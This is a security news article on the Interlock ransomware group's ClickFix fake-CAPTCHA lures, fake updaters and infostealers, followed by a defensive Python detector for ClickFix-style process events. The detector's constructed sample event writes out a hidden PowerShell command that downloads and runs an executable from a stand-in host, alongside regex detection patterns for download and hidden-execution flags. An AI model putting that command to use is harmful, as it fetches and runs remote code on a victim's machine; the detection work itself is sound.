The emerging ransomware group Interlock was observed evolving its tactics in early 2025, leveraging the ClickFix social-engineering technique and infostealers in its attacks, Sekoia.io reported Wednesday.

Interlock first emerged in late September and has largely flown under the radar due to its modest victim count of 24, six of which were claimed this year, according to Sekoia. However, Interlock’s attacks, which mostly target organizations in North America and Europe, have had a significant impact: its attack on the Texas Tech University Health Sciences Center led to the compromise of nearly 1.5 million patients’ data.

“Despite its relatively low victim count in Q1 2025, the group has demonstrated adaptability and innovation in its tactics,” the Sekoia blog stated.

The group works independently, rather than as a ransomware-as-a-service (RaaS) operator or affiliate, and mainly uses fake updater downloads to trick victims into installing its malware. Interlock previously used fake browser updates, including for Google Chrome and Microsoft Edge, as lures, but in January 2025 began using fake security software updates masquerading as FortiClient, Ivanti Secure Access, Palo Alto Networks GlobalProtect and more.

Also in January 2025, Sekoia observed Interlock leveraging the social-engineering technique known as ClickFix, which uses fake CAPTCHA prompts to convince victims to copy and paste PowerShell commands into their Windows terminal. This technique has grown in popularity since August 2024, according to Group-IB, and has also been used in attacks by the North Korean threat group Lazarus, in the ClearFake infostealer distribution campaign, and in a March 2025 supply chain attack affecting more than 100 car dealerships.

Interlock used compromised legitimate websites both to promote its fake updater downloads and to present fake Cloudflare CAPTCHAs, which instruct victims to copy and paste the malicious command to proceed. In these ClickFix campaigns, last observed in February 2025, the PowerShell command installs a PyInstaller file with an embedded script that is executed to deploy a PowerShell backdoor. The command also opens the legitimate Advanced IP Scanner webpage in the browser to mislead the user.

Sekoia noted it did not observe additional payloads being installed or executed via this backdoor, suggesting that Interlock sought to experiment with the social-engineering technique. However, in addition to ransomware, Interlock has been known to use keyloggers and infostealers in its campaigns. Most recently, Interlock added BerserkStealer and LummaStealer to its arsenal, in January and February 2025 respectively. While little information is available about BerserkStealer, LummaStealer, also known as LummaC2, is a popular malware-as-a-service (MaaS) offering observed since 2022.

“Interlock continued to improve their tools and methods, which reflects a willingness to maintain relevance while avoiding the large-scale visibility associated with more prolific ransomware groups such as the attention-seeker FunkSec ransomware group,” the Sekoia researchers wrote.

Beyond these evolving tactics, Interlock has consistently used its own custom ransomware for Windows and Linux, as well as a novel remote access trojan (RAT) backdoor known as Interlock RAT. The group mainly uses the remote desktop protocol (RDP) and the credentials retrieved by its infostealers to achieve lateral movement, and has also used PuTTY and AnyDesk for remote access. Interlock’s ransom note was recently modified to emphasize the potential legal liability of the victim company if stolen data is leaked.

Earlier this month, Interlock claimed an attack against the National Defense Corporation, a subsidiary of ammunition and home appliance manufacturer National Presto Industries, alleging that it stole nearly 3 million files in the attack.
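The ClickFix chain described above (a user pastes a PowerShell command that downloads and runs a stage, then opens the legitimate Advanced IP Scanner page as a decoy) leaves a recognizable shape in process-creation telemetry. The following is an added detection example, not code from Sekoia or from the article; the Sysmon-style events, the `lure.invalid` host and the file paths are constructed samples, and the indicator names are hypothetical.

```python
import re

# Constructed Sysmon-style process-creation events (not telemetry from any real incident).
SAMPLE_EVENTS = [
    {   # user pasted a ClickFix-style command into the Run dialog / terminal
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'powershell -w hidden -c "iwr http://lure.invalid/u.exe -OutFile C:\Users\Public\u.exe; '
                   r'& C:\Users\Public\u.exe; start https://www.advanced-ip-scanner.com/"',
    },
    {   # benign: management agent running a scheduled script
        "parent": r"C:\Program Files\Vendor\agent.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -File C:\scripts\inventory.ps1",
    },
    {   # benign: ordinary interactive launch of a non-interpreter
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": "notepad.exe",
    },
]

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
DOWNLOAD_CUES = re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I)
HIDDEN_CUES = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-enc(odedcommand)?\b", re.I)
DECOY_CUE = re.compile(r"\bstart\b\s+https?://", re.I)


def clickfix_indicators(event):
    """Return the ClickFix-style indicators matched by one event (empty list if none)."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    # Only interactive launches from the shell (Run dialog, terminal) are in scope.
    if image not in INTERPRETERS or parent != "explorer.exe":
        return []
    reasons = ["interpreter spawned by explorer.exe"]
    if HIDDEN_CUES.search(event["cmdline"]):
        reasons.append("hidden/encoded execution flag")
    if DOWNLOAD_CUES.search(event["cmdline"]):
        reasons.append("download cmdlet in command line")
    if DECOY_CUE.search(event["cmdline"]):
        reasons.append("opens a decoy web page after payload stage")
    # explorer.exe as parent alone is too noisy to alert on; require a second cue.
    return reasons if len(reasons) > 1 else []


def triage(events):
    """Return (index, reasons) for every event that trips at least two indicators."""
    hits = []
    for i, e in enumerate(events):
        reasons = clickfix_indicators(e)
        if reasons:
            hits.append((i, reasons))
    return hits
```

Feeding real Sysmon Event ID 1 records into `triage` only requires mapping the ParentImage, Image and CommandLine fields onto the three keys used here.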